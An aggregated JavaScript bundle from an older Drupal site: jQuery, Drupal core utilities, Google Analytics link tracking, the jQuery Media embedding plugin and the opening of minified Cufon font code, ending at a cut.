G=this.offsetParent(),J=this.offset(),E=/^body|html$/i.test(G[0].tagName)?{top:0,left:0}:G.offset();J.top-=j(this,"marginTop");J.left-=j(this,"marginLeft");E.top+=j(G,"borderTopWidth");E.left+=j(G,"borderLeftWidth");F={top:J.top-E.top,left:J.left-E.left}}return F},offsetParent:function(){var E=this[0].offsetParent||document.body;while(E&&(!/^body|html$/i.test(E.tagName)&&o.css(E,"position")=="static")){E=E.offsetParent}return o(E)}});o.each(["Left","Top"],function(F,E){var G="scroll"+E;o.fn[G]=function(H){if(!this[0]){return null}return H!==g?this.each(function(){this==l||this==document?l.scrollTo(!F?H:o(l).scrollLeft(),F?H:o(l).scrollTop()):this[G]=H}):this[0]==l||this[0]==document?self[F?"pageYOffset":"pageXOffset"]||o.boxModel&&document.documentElement[G]||document.body[G]:this[0][G]}});o.each(["Height","Width"],function(I,G){var E=I?"Left":"Top",H=I?"Right":"Bottom",F=G.toLowerCase();o.fn["inner"+G]=function(){return this[0]?o.css(this[0],F,false,"padding"):null};o.fn["outer"+G]=function(K){return this[0]?o.css(this[0],F,false,K?"margin":"border"):null};var J=G.toLowerCase();o.fn[J]=function(K){return this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]||document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})();;

var Drupal = Drupal || { 'settings': {}, 'behaviors': {}, 'themes': {}, 'locale': {} };

/**
 * Set the variable that indicates if JavaScript behaviors should be applied
 */
Drupal.jsEnabled = document.getElementsByTagName && document.createElement && document.createTextNode && document.documentElement && document.getElementById;

/**
 * Attach all registered behaviors to a page element.
 *
 * Behaviors are event-triggered actions that attach to page elements, enhancing
 * default non-Javascript UIs. Behaviors are registered in the Drupal.behaviors
 * object as follows:
 * @code
 *    Drupal.behaviors.behaviorName = function () {
 *      ...
 *    };
 * @endcode
 *
 * Drupal.attachBehaviors is added below to the jQuery ready event and so
 * runs on initial page load. Developers implementing AHAH/AJAX in their
 * solutions should also call this function after new page content has been
 * loaded, feeding in an element to be processed, in order to attach all
 * behaviors to the new content.
 *
 * Behaviors should use a class in the form behaviorName-processed to ensure
 * the behavior is attached only once to a given element. (Doing so enables
 * the reprocessing of given elements, which may be needed on occasion despite
 * the ability to limit behavior attachment to a particular element.)
 *
 * @param context
 *   An element to attach behaviors to. If none is given, the document element
 *   is used.
 */
Drupal.attachBehaviors = function(context) {
  context = context || document;
  if (Drupal.jsEnabled) {
    // Execute all of them.
    jQuery.each(Drupal.behaviors, function() {
      this(context);
    });
  }
};

/**
 * Encode special characters in a plain-text string for display as HTML.
 */
Drupal.checkPlain = function(str) {
  str = String(str);
  var replace = { '&': '&amp;', '"': '&quot;', '<': '&lt;', '>': '&gt;' };
  for (var character in replace) {
    var regex = new RegExp(character, 'g');
    str = str.replace(regex, replace[character]);
  }
  return str;
};

/**
 * Translate strings to the page language or a given language.
 *
 * See the documentation of the server-side t() function for further details.
 *
 * @param str
 *   A string containing the English string to translate.
 * @param args
 *   An object of replacements pairs to make after translation. Incidences
 *   of any key in this array are replaced with the corresponding value.
 *   Based on the first character of the key, the value is escaped and/or themed:
 *    - !variable: inserted as is
 *    - @variable: escape plain text to HTML (Drupal.checkPlain)
 *    - %variable: escape text and theme as a placeholder for user-submitted
 *      content (checkPlain + Drupal.theme('placeholder'))
 * @return
 *   The translated string.
 */
Drupal.t = function(str, args) {
  // Fetch the localized version of the string.
  if (Drupal.locale.strings && Drupal.locale.strings[str]) {
    str = Drupal.locale.strings[str];
  }

  if (args) {
    // Transform arguments before inserting them
    for (var key in args) {
      switch (key.charAt(0)) {
        // Escaped only
        case '@':
          args[key] = Drupal.checkPlain(args[key]);
        break;
        // Pass-through
        case '!':
          break;
        // Escaped and placeholder
        case '%':
        default:
          args[key] = Drupal.theme('placeholder', args[key]);
          break;
      }
      str = str.replace(key, args[key]);
    }
  }
  return str;
};

/**
 * Format a string containing a count of items.
 *
 * This function ensures that the string is pluralized correctly. Since Drupal.t() is
 * called by this function, make sure not to pass already-localized strings to it.
 *
 * See the documentation of the server-side format_plural() function for further details.
 *
 * @param count
 *   The item count to display.
 * @param singular
 *   The string for the singular case. Please make sure it is clear this is
 *   singular, to ease translation (e.g. use "1 new comment" instead of "1 new").
 *   Do not use @count in the singular string.
 * @param plural
 *   The string for the plural case. Please make sure it is clear this is plural,
 *   to ease translation. Use @count in place of the item count, as in "@count
 *   new comments".
 * @param args
 *   An object of replacements pairs to make after translation. Incidences
 *   of any key in this array are replaced with the corresponding value.
 *   Based on the first character of the key, the value is escaped and/or themed:
 *    - !variable: inserted as is
 *    - @variable: escape plain text to HTML (Drupal.checkPlain)
 *    - %variable: escape text and theme as a placeholder for user-submitted
 *      content (checkPlain + Drupal.theme('placeholder'))
 *   Note that you do not need to include @count in this array.
 *   This replacement is done automatically for the plural case.
 * @return
 *   A translated string.
 */
Drupal.formatPlural = function(count, singular, plural, args) {
  var args = args || {};
  args['@count'] = count;
  // Determine the index of the plural form.
  var index = Drupal.locale.pluralFormula ? Drupal.locale.pluralFormula(args['@count']) : ((args['@count'] == 1) ? 0 : 1);

  if (index == 0) {
    return Drupal.t(singular, args);
  }
  else if (index == 1) {
    return Drupal.t(plural, args);
  }
  else {
    args['@count['+ index +']'] = args['@count'];
    delete args['@count'];
    return Drupal.t(plural.replace('@count', '@count['+ index +']'));
  }
};

/**
 * Generate the themed representation of a Drupal object.
 *
 * All requests for themed output must go through this function. It examines
 * the request and routes it to the appropriate theme function. If the current
 * theme does not provide an override function, the generic theme function is
 * called.
 *
 * For example, to retrieve the HTML that is output by theme_placeholder(text),
 * call Drupal.theme('placeholder', text).
 *
 * @param func
 *   The name of the theme function to call.
 * @param ...
 *   Additional arguments to pass along to the theme function.
 * @return
 *   Any data the theme function returns. This could be a plain HTML string,
 *   but also a complex object.
 */
Drupal.theme = function(func) {
  for (var i = 1, args = []; i < arguments.length; i++) {
    args.push(arguments[i]);
  }

  return (Drupal.theme[func] || Drupal.theme.prototype[func]).apply(this, args);
};

/**
 * Parse a JSON response.
 *
 * The result is either the JSON object, or an object with 'status' 0 and 'data' an error message.
 */
Drupal.parseJson = function (data) {
  if ((data.substring(0, 1) != '{') && (data.substring(0, 1) != '[')) {
    return { status: 0, data: data.length ? data : Drupal.t('Unspecified error') };
  }
  return eval('(' + data + ');');
};

/**
 * Freeze the current body height (as minimum height). Used to prevent
 * unnecessary upwards scrolling when doing DOM manipulations.
 */
Drupal.freezeHeight = function () {
  Drupal.unfreezeHeight();
  var div = document.createElement('div');
  $(div).css({
    position: 'absolute',
    top: '0px',
    left: '0px',
    width: '1px',
    height: $('body').css('height')
  }).attr('id', 'freeze-height');
  $('body').append(div);
};

/**
 * Unfreeze the body height
 */
Drupal.unfreezeHeight = function () {
  $('#freeze-height').remove();
};

/**
 * Wrapper around encodeURIComponent() which avoids Apache quirks (equivalent of
 * drupal_urlencode() in PHP). This function should only be used on paths, not
 * on query string arguments.
 */
Drupal.encodeURIComponent = function (item, uri) {
  uri = uri || location.href;
  item = encodeURIComponent(item).replace(/%2F/g, '/');
  return (uri.indexOf('?q=') != -1) ? item : item.replace(/%26/g, '%2526').replace(/%23/g, '%2523').replace(/\/\//g, '/%252F');
};

/**
 * Get the text selection in a textarea.
 */
Drupal.getSelection = function (element) {
  if (typeof(element.selectionStart) != 'number' && document.selection) {
    // The current selection
    var range1 = document.selection.createRange();
    var range2 = range1.duplicate();
    // Select all text.
    range2.moveToElementText(element);
    // Now move 'dummy' end point to end point of original range.
    range2.setEndPoint('EndToEnd', range1);
    // Now we can calculate start and end points.
    var start = range2.text.length - range1.text.length;
    var end = start + range1.text.length;
    return { 'start': start, 'end': end };
  }
  return { 'start': element.selectionStart, 'end': element.selectionEnd };
};

/**
 * Build an error message from ahah response.
 */
Drupal.ahahError = function(xmlhttp, uri) {
  if (xmlhttp.status == 200) {
    if (jQuery.trim($(xmlhttp.responseText).text())) {
      var message = Drupal.t("An error occurred. \n@uri\n@text", {'@uri': uri, '@text': xmlhttp.responseText });
    }
    else {
      var message = Drupal.t("An error occurred. \n@uri\n(no information available).", {'@uri': uri, '@text': xmlhttp.responseText });
    }
  }
  else {
    var message = Drupal.t("An HTTP error @status occurred. \n@uri", {'@uri': uri, '@status': xmlhttp.status });
  }
  return message;
}

// Global Killswitch on the <html> element
if (Drupal.jsEnabled) {
  // Global Killswitch on the <html> element
  $(document.documentElement).addClass('js');
  // 'js enabled' cookie
  document.cookie = 'has_js=1; path=/';
  // Attach all behaviors.
  $(document).ready(function() {
    Drupal.attachBehaviors(this);
  });
}

/**
 * The default themes.
 */
Drupal.theme.prototype = {

  /**
   * Formats text for emphasized display in a placeholder inside a sentence.
   *
   * @param str
   *   The text to format (plain-text).
   * @return
   *   The formatted text (html).
   */
  placeholder: function(str) {
    return '<em>' + Drupal.checkPlain(str) + '</em>';
  }
};
;

$(document).ready(function() {

  // Attach onclick event to document only and catch clicks on all elements.
  $(document.body).click(function(event) {
    // Catch only the first parent link of a clicked element.
    $(event.target).parents("a:first,area:first").andSelf().filter("a,area").each(function() {

      var ga = Drupal.settings.googleanalytics;
      // Expression to check for absolute internal links.
      var isInternal = new RegExp("^(https?):\/\/" + window.location.host, "i");
      // Expression to check for special links like gotwo.module /go/* links.
      var isInternalSpecial = new RegExp("(\/go\/.*)$", "i");
      // Expression to check for download links.
      var isDownload = new RegExp("\\.(" + ga.trackDownloadExtensions + ")$", "i");

      // Is the clicked URL internal?
      if (isInternal.test(this.href)) {
        // Is download tracking activated and the file extension configured for download tracking?
        if (ga.trackDownload && isDownload.test(this.href)) {
          // Download link clicked.
          var extension = isDownload.exec(this.href);
          _gaq.push(["_trackEvent", "Downloads", extension[1].toUpperCase(), this.href.replace(isInternal, '')]);
        }
        else if (isInternalSpecial.test(this.href)) {
          // Keep the internal URL for Google Analytics website overlay intact.
          _gaq.push(["_trackPageview", this.href.replace(isInternal, '')]);
        }
      }
      else {
        if (ga.trackMailto && $(this).is("a[href^=mailto:],area[href^=mailto:]")) {
          // Mailto link clicked.
          _gaq.push(["_trackEvent", "Mails", "Click", this.href.substring(7)]);
        }
        else if (ga.trackOutgoing && this.href) {
          if (ga.trackOutboundAsPageview) {
            // Track all external links as page views after URL cleanup.
            // Currently required, if click should be tracked as goal.
            _gaq.push(["_trackPageview", '/outbound/' + this.href.replace(/^(https?|ftp|news|nntp|telnet|irc|ssh|sftp|webcal):\/\//i, '').split('/').join('--')]);
          }
          else {
            // External link clicked.
            _gaq.push(["_trackEvent", "Outbound links", "Click", this.href]);
          }
        }
      }
    });
  });
});
;
/*
 * jQuery Media Plugin for converting elements into rich media content.
 *
 * Examples and documentation at: http://malsup.com/jquery/media/
 * Copyright (c) 2007-2008 M. Alsup
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 *
 * @author: M. Alsup
 * @version: 0.81 (06/05/2008)
 * @requires jQuery v1.1.2 or later
 * $Id: jquery.media.js,v 1.1.4.1 2008/06/30 14:26:55 aaron Exp $
 *
 * Supported Media Players:
 *    - Flash
 *    - Quicktime
 *    - Real Player
 *    - Silverlight
 *    - Windows Media Player
 *    - iframe
 *
 * Supported Media Formats:
 *   Any types supported by the above players, such as:
 *     Video: asf, avi, flv, mov, mpg, mpeg, mp4, qt, smil, swf, wmv, 3g2, 3gp
 *     Audio: aif, aac, au, gsm, mid, midi, mov, mp3, m4a, snd, rm, wav, wma
 *     Other: bmp, html, pdf, psd, qif, qtif, qti, tif, tiff, xaml
 *
 * Thanks to Mark Hicken and Brent Pedersen for helping me debug this on the Mac!
 * Thanks to Dan Rossi for numerous bug reports and code bits!
 */
;(function($) {

/**
 * Chainable method for converting elements into rich media.
 *
 * @param options
 * @param callback fn invoked for each matched element before conversion
 * @param callback fn invoked for each matched element after conversion
 */
$.fn.media = function(options, f1, f2) {
    return this.each(function() {
        if (typeof options == 'function') {
            f2 = f1;
            f1 = options;
            options = {};
        }
        var o = getSettings(this, options);
        // pre-conversion callback, passes original element and fully populated options
        if (typeof f1 == 'function') f1(this, o);
        
        var r = getTypesRegExp();
        var m = r.exec(o.src) || [''];
        o.type ? m[0] = o.type : m.shift();
        for (var i=0; i < m.length; i++) {
            fn = m[i].toLowerCase();
            if (isDigit(fn[0])) fn = 'fn' + fn; // fns can't begin with numbers
            if (!$.fn.media[fn]) 
                continue;  // unrecognized media type
            // normalize autoplay settings
            var player = $.fn.media[fn+'_player'];
            if (!o.params) o.params = {};
            if (player) {
                var num = player.autoplayAttr == 'autostart';
                o.params[player.autoplayAttr || 'autoplay'] = num ? (o.autoplay ? 1 : 0) : o.autoplay ? true : false;
            }
            var $div = $.fn.media[fn](this, o);

            $div.css('backgroundColor', o.bgColor).width(o.width);
            // post-conversion callback, passes original element, new div element and fully populated options
            if (typeof f2 == 'function') f2(this, $div[0], o, player.name);
            break;
        }
    });
};

/**
 * Non-chainable method for adding or changing file format / player mapping
 * @name mapFormat
 * @param String format File format extension (ie: mov, wav, mp3)
 * @param String player Player name to use for the format (one of: flash, quicktime, realplayer, winmedia, silverlight or iframe
 */
$.fn.media.mapFormat = function(format, player) {
    if (!format || !player || !$.fn.media.defaults.players[player]) return; // invalid
    format = format.toLowerCase();
    if (isDigit(format[0])) format = 'fn' + format;
    $.fn.media[format] = $.fn.media[player];
    $.fn.media[format+'_player'] = $.fn.media.defaults.players[player];
};

// global defautls; override as needed
$.fn.media.defaults = {
    width:         400,
    height:        400,
    autoplay:      0,         // normalized cross-player setting
    bgColor:       '#ffffff', // background color
    params:        { wmode: 'transparent'},  // added to object element as param elements; added to embed element as attrs
    attrs:         {},        // added to object and embed elements as attrs
    flashvars:     {},        // added to flash content as flashvars param/attr
    flashVersion:  '7',       // required flash version
    expressInstaller: null,   // src for express installer
    
    // default flash video and mp3 player (@see: http://jeroenwijering.com/?item=Flash_Media_Player)
    flvPlayer:     'mediaplayer.swf',
    mp3Player:     'mediaplayer.swf',
    
    // @see http://msdn2.microsoft.com/en-us/library/bb412401.aspx
    silverlight: {
        inplaceInstallPrompt: 'true', // display in-place install prompt?
        isWindowless:         'true', // windowless mode (false for wrapping markup)
        framerate:            '24',   // maximum framerate
        version:              '0.9',  // Silverlight version
        onError:              null,   // onError callback
        onLoad:               null,   // onLoad callback
        initParams:           null,   // object init params
        userContext:          null    // callback arg passed to the load callback
    }
};

// Media Players; think twice before overriding
$.fn.media.defaults.players = {
    flash: {
        name:         'flash',
        types:        'flv,mp3,swf',
        oAttrs:   {
            classid:  'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000',
            type:     'application/x-oleobject',
            codebase: 'http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=' + $.fn.media.defaults.flashVersion
        },
        eAttrs: {
            type:         'application/x-shockwave-flash',
            pluginspage:  'http://www.adobe.com/go/getflashplayer'
        }        
    },
    quicktime: {
        name:         'quicktime',
        types:        'aif,aiff,aac,au,bmp,gsm,mov,mid,midi,mpg,mpeg,mp4,m4a,psd,qt,qtif,qif,qti,snd,tif,tiff,wav,3g2,3gp',
        oAttrs:   {
            classid:  'clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B',
            codebase: 'http://www.apple.com/qtactivex/qtplugin.cab'
        },
        eAttrs: {
            pluginspage:  'http://www.apple.com/quicktime/download/'
        }
    },
    realplayer: {
        name:         'real',
        types:        'ra,ram,rm,rpm,rv,smi,smil',
        autoplayAttr: 'autostart',
        oAttrs:   {
            classid:  'clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA'
        },
        eAttrs: {
            type:         'audio/x-pn-realaudio-plugin',
            pluginspage:  'http://www.real.com/player/'
        }
    },
    winmedia: {
        name:         'winmedia',
        types:        'asf,avi,wma,wmv',
        autoplayAttr: 'autostart',
        oUrl:         'url',
        oAttrs:   {
            classid:  'clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6',
            type:     'application/x-oleobject'
        },
        eAttrs: {
            type:         $.browser.mozilla && isFirefoxWMPPluginInstalled() ? 'application/x-ms-wmp' : 'application/x-mplayer2',
            pluginspage:  'http://www.microsoft.com/Windows/MediaPlayer/'
        }        
    },
    // special cases
    iframe: {
        name:  'iframe',
        types: 'html,pdf'
    },
    silverlight: {
        name:  'silverlight',
        types: 'xaml'
    }
};

//
//  everything below here is private
//


// detection script for FF WMP plugin (http://www.therossman.org/experiments/wmp_play.html)
// (hat tip to Mark Ross for this script)
function isFirefoxWMPPluginInstalled() {
    var plugs = navigator.plugins;
    for (i = 0; i < plugs.length; i++) {
        var plugin = plugs[i];
        if (plugin['filename'] == 'np-mswmp.dll')
            return true;
    }
    return false;
}

var counter = 1;

for (var player in $.fn.media.defaults.players) {
    var types = $.fn.media.defaults.players[player].types;
    $.each(types.split(','), function(i,o) {
        if (isDigit(o[0])) o = 'fn' + o;
        $.fn.media[o] = $.fn.media[player] = getGenerator(player);
        $.fn.media[o+'_player'] = $.fn.media.defaults.players[player];
    });
};

function getTypesRegExp() {
    var types = '';
    for (var player in $.fn.media.defaults.players) {
        if (types.length) types += ',';
        types += $.fn.media.defaults.players[player].types;
    };
    return new RegExp('\\.(' + types.replace(/,/g,'|') + ')\\b');
};

function getGenerator(player) {
    return function(el, options) {
        return generate(el, options, player);
    };
};

function isDigit(c) {
    return '0123456789'.indexOf(c) > -1;
};

// flatten all possible options: global defaults, meta, option obj
function getSettings(el, options) {
    options = options || {};
    var $el = $(el);
    var cls = el.className || '';
    // support metadata plugin (v1.0 and v2.0)
    var meta = $.metadata ? $el.metadata() : $.meta ? $el.data() : {};
    meta = meta || {};
    var w = meta.width  || parseInt(((cls.match(/w:(\d+)/)||[])[1]||0));
    var h = meta.height || parseInt(((cls.match(/h:(\d+)/)||[])[1]||0));
    
    if (w) meta.width  = w;
    if (h) meta.height = h;
    if (cls) meta.cls = cls;

    var a = $.fn.media.defaults;
    var b = options;
    var c = meta;

    var p = { params: { bgColor: options.bgColor || $.fn.media.defaults.bgColor } };
    var opts = $.extend({}, a, b, c);
    $.each(['attrs','params','flashvars','silverlight'], function(i,o) {
        opts[o] = $.extend({}, p[o] || {}, a[o] || {}, b[o] || {}, c[o] || {});
    });

    if (typeof opts.caption == 'undefined') opts.caption = $el.text();

    // make sure we have a source!
    opts.src = opts.src || $el.attr('href') || $el.attr('src') || 'unknown';
    return opts;
};

//
//  Flash Player
//

// generate flash using SWFObject library if possible
$.fn.media.swf = function(el, opts) {
    if (!window.SWFObject && !window.swfobject) {
        // roll our own
        if (opts.flashvars) {
            var a = [];
            for (var f in opts.flashvars)
                a.push(f + '=' + opts.flashvars[f]);
            if (!opts.params) opts.params = {};
            opts.params.flashvars = a.join('&');
        }
        return generate(el, opts, 'flash');
    }

    var id = el.id ? (' id="'+el.id+'"') : '';
    var cls = opts.cls ? (' class="' + opts.cls + '"') : '';
    var $div = $('<div' + id + cls + '>');

    // swfobject v2+
    if (window.swfobject) {
        $(el).after($div).appendTo($div);
        if (!el.id) el.id = 'movie_player_' + counter++;

        // replace el with swfobject content
        swfobject.embedSWF(opts.src, el.id, opts.width, opts.height, opts.flashVersion, 
            opts.expressInstaller, opts.flashvars, opts.params, opts.attrs);
    }
    // swfobject < v2
    else {
        $(el).after($div).remove();
        var so = new SWFObject(opts.src, 'movie_player_' + counter++, opts.width, opts.height, opts.flashVersion, opts.bgColor);
        if (opts.expressInstaller) so.useExpressInstall(opts.expressInstaller);    

        for (var p in opts.params)
            if (p != 'bgColor') so.addParam(p, opts.params[p]);
        for (var f in opts.flashvars)
            so.addVariable(f, opts.flashvars[f]);
        so.write($div[0]);
    }

    if (opts.caption) $('<div>').appendTo($div).html(opts.caption);
    return $div;
};

// map flv and mp3 files to the swf player by default
$.fn.media.flv = $.fn.media.mp3 = function(el, opts) {
    var src = opts.src;
    var player = /\.mp3\b/i.test(src) ? $.fn.media.defaults.mp3Player : $.fn.media.defaults.flvPlayer;
    opts.src = player;
    opts.src = opts.src + '?file=' + src;
    opts.flashvars = $.extend({}, { file: src }, opts.flashvars );
    return $.fn.media.swf(el, opts);
};

//
//  Silverlight
//
$.fn.media.xaml = function(el, opts) {
    if (!window.Sys || !window.Sys.Silverlight) {
        if ($.fn.media.xaml.warning) return;
        $.fn.media.xaml.warning = 1;
        alert('You must include the Silverlight.js script.');
        return;
    }

    var props = {
        width: opts.width,
        height: opts.height,
        background: opts.bgColor,
        inplaceInstallPrompt: opts.silverlight.inplaceInstallPrompt,
        isWindowless: opts.silverlight.isWindowless,
        framerate: opts.silverlight.framerate,
        version: opts.silverlight.version
    };
    var events = {
        onError: opts.silverlight.onError,
        onLoad: opts.silverlight.onLoad
    };

    var id1 = el.id ? (' id="'+el.id+'"') : '';
    var id2 = opts.id || 'AG' + counter++;
    // convert element to div
    var cls = opts.cls ? (' class="' + opts.cls + '"') : '';
    var $div = $('<div' + id1 + cls + '>');
    $(el).after($div).remove();
    
    Sys.Silverlight.createObjectEx({
        source: opts.src,
        initParams: opts.silverlight.initParams,
        userContext: opts.silverlight.userContext,
        id: id2,
        parentElement: $div[0],
        properties: props,
        events: events
    });

    if (opts.caption) $('<div>').appendTo($div).html(opts.caption);
    return $div;
};

//
// generate object/embed markup
//
function generate(el, opts, player) {
    var $el = $(el);
    var o = $.fn.media.defaults.players[player];
    
    if (player == 'iframe') {
        var o = $('<iframe' + ' width="' + opts.width + '" height="' + opts.height + '" >');
        o.attr('src', opts.src);
        o.css('backgroundColor', o.bgColor);
    }
    else if ($.browser.msie) {
        var a = ['<object width="' + opts.width + '" height="' + opts.height + '" '];
        for (var key in opts.attrs)
            a.push(key + '="'+opts.attrs[key]+'" ');
        for (var key in o.oAttrs || {})
            a.push(key + '="'+o.oAttrs[key]+'" ');
        a.push('></ob'+'ject'+'>');
        var p = ['<param name="' + (o.oUrl || 'src') +'" value="' + opts.src + '">'];
        for (var key in opts.params)
            p.push('<param name="'+ key +'" value="' + opts.params[key] + '">');
        var o = document.createElement(a.join(''));
        for (var i=0; i < p.length; i++)
            o.appendChild(document.createElement(p[i]));
    }
    else {
        var a = ['<embed width="' + opts.width + '" height="' + opts.height + '" style="display:block"'];
        if (opts.src) a.push(' src="' + opts.src + '" ');
        for (var key in opts.attrs)
            a.push(key + '="'+opts.attrs[key]+'" ');
        for (var key in o.eAttrs || {})
            a.push(key + '="'+o.eAttrs[key]+'" ');
        for (var key in opts.params)
            a.push(key + '="'+opts.params[key]+'" ');
        a.push('></em'+'bed'+'>');
    }
    // convert element to div
    var id = el.id ? (' id="'+el.id+'"') : '';
    var cls = opts.cls ? (' class="' + opts.cls + '"') : '';
    var $div = $('<div' + id + cls + '>');
    $el.after($div).remove();
    ($.browser.msie || player == 'iframe') ? $div.append(o) : $div.html(a.join(''));
    if (opts.caption) $('<div>').appendTo($div).html(opts.caption);
    return $div;
};


})(jQuery);
;
;
/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09i
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var 